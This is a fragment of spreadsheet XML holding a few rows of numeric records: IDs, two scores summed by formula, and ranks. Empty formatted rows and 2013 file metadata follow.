    <row r="732" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A732" s="8" t="n">
        <v>4300112</v>
      </c>
      <c r="B732" s="8" t="n">
        <v>1314011019</v>
      </c>
      <c r="C732" s="8" t="s">
        <v>172</v>
      </c>
      <c r="D732" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E732" s="8" t="n">
        <v>57</v>
      </c>
      <c r="F732" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="G732" s="8"/>
      <c r="H732" s="8" t="n">
        <f aca="false">SUM(E732:G732)</f>
        <v>119.8</v>
      </c>
      <c r="I732" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="733" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A733" s="8" t="n">
        <v>4300112</v>
      </c>
      <c r="B733" s="8" t="n">
        <v>1314011020</v>
      </c>
      <c r="C733" s="8" t="s">
        <v>172</v>
      </c>
      <c r="D733" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E733" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F733" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="G733" s="8"/>
      <c r="H733" s="8" t="n">
        <f aca="false">SUM(E733:G733)</f>
        <v>116</v>
      </c>
      <c r="I733" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="734" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A734" s="8" t="n">
        <v>4300112</v>
      </c>
      <c r="B734" s="8" t="n">
        <v>1314011018</v>
      </c>
      <c r="C734" s="8" t="s">
        <v>172</v>
      </c>
      <c r="D734" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E734" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F734" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G734" s="8"/>
      <c r="H734" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I734" s="8" t="n">
        <v>4</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:I1"/>
  </mergeCells>
  <printOptions headings="false" gridLines="false" gridLinesSet="true" horizontalCentered="true" verticalCentered="false"/>
  <pageMargins left="0" right="0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4.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A1" s="17"/>
      <c r="C1" s="17"/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7"/>
      <c r="C3" s="17"/>
    </row>
    <row r="4" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A4" s="18" t="n">
        <v>3</v>
      </c>
      <c r="C4" s="17"/>
    </row>
    <row r="5" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C5" s="17"/>
    </row>
    <row r="6" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C6" s="17"/>
    </row>
    <row r="7" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A7" s="17"/>
      <c r="C7" s="17"/>
    </row>
    <row r="8" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A8" s="17"/>
      <c r="C8" s="17"/>
    </row>
    <row r="9" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A9" s="17"/>
      <c r="C9" s="17"/>
    </row>
    <row r="10" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A10" s="17"/>
      <c r="C10" s="17"/>
    </row>
    <row r="11" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A11" s="17"/>
      <c r="C11" s="17"/>
    </row>
    <row r="12" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C12" s="17"/>
    </row>
    <row r="13" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C13" s="17"/>
    </row>
    <row r="14" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A14" s="17"/>
      <c r="C14" s="17"/>
    </row>
    <row r="15" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A15" s="17"/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7"/>
      <c r="C17" s="17"/>
    </row>
    <row r="18" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C18" s="17"/>
    </row>
    <row r="19" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C19" s="17"/>
    </row>
    <row r="20" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A20" s="17"/>
      <c r="C20" s="17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  <c r="C22" s="17"/>
    </row>
    <row r="23" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A23" s="17"/>
      <c r="C23" s="17"/>
    </row>
    <row r="24" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A24" s="17"/>
    </row>
    <row r="25" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="I25" s="17"/>
    </row>
    <row r="26" customFormat="false" ht="15" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A26" s="17"/>
      <c r="C26" s="17"/>
    </row>
    <row r="27" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A27" s="17"/>
      <c r="C27" s="17"/>
    </row>
    <row r="28" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A28" s="17"/>
      <c r="C28" s="17"/>
    </row>
    <row r="29" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A29" s="17"/>
      <c r="C29" s="17"/>
    </row>
    <row r="30" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A30" s="17"/>
      <c r="C30" s="17"/>
    </row>
    <row r="31" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A31" s="17"/>
      <c r="C31" s="17"/>
    </row>
    <row r="32" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A32" s="17"/>
      <c r="C32" s="17"/>
    </row>
    <row r="33" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A33" s="17"/>
      <c r="C33" s="17"/>
    </row>
    <row r="34" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A34" s="17"/>
      <c r="C34" s="17"/>
    </row>
    <row r="35" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A35" s="17"/>
      <c r="C35" s="17"/>
    </row>
    <row r="36" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A36" s="17"/>
      <c r="C36" s="17"/>
    </row>
    <row r="37" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A37" s="17"/>
    </row>
    <row r="38" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A38" s="17"/>
    </row>
    <row r="39" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A39" s="17"/>
      <c r="C39" s="17"/>
    </row>
    <row r="40" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A40" s="17"/>
      <c r="C40" s="17"/>
    </row>
    <row r="41" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A41" s="17"/>
      <c r="C41" s="17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0:00:34Z</dcterms:created>
  <dc:creator>微软用户</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>微软用户</cp:lastModifiedBy>
  <cp:lastPrinted>2013-07-19T14:37:23Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-22T15:07:49Z</dcterms:modified>
  <cp:revision>0</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>